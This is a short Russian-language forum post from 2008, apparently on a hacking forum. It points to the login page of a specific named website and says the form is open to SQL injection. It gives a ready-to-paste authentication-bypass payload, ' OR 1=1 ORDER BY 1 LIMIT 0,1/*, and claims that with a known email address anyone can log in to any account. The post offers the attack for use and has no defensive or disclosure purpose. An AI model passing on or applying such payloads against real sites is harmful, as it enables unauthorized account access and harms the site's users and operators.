09.01.2008, 13:07
|
|
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549
Репутация:
1318
|
|
Короче нафик копаться... Форма входа уязвима к SQL-Injection...
http://spec.proclub.ru/modules/tests/test/courses/index.php?LOGIN=NOW
Введите логин аля
' OR 1=1 ORDER BY 1 LIMIT 0,1/*
и у вас будет вход в систему... Если знаете мыло, то можете войти под любым аккаунтом... |
|
|